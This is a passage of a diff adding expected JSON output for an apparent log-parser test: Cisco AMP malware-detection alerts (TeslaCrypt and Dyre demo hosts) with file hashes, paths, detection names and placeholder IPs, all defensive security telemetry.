"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261639", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27769, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + 
"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261638", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 29385, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + 
"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261637", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 680000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 30665, + "process.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "process.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "process.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "process.name": "t.exe", + "process.pid": 2712, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + 
"related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261636", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 665000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 32281, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:36.000Z", + 
"cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251503560261635", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 509000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251503560262000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 33561, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], 
+ "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:25.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259028591575130", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 984000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176259028591575000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 35128, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:21.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.detection_id": "6159251439135752194", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 455000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251439135752000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "t.exe", + "file.path": "\\\\?\\C:\\t.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 36447, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + 
"cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:14.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258981346934873", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 346000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258981346935000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 38014, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:02.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + 
{ + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258929807327320", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258929807327000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 39333, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542427", + "cisco.amp.event_type_id": 1090519054, + 
"cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 470000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40652, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542426", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + 
"cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 112000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 41978, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:14:55.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668103677542425", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 71000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + 
"event.dataset": "cisco.amp", + "event.id": 6533668103677542000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43297, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537367", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 532000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", 
+ "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 44622, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667841684537366", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 454000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 45948, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667841684537365", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 80000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667841684537000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": 
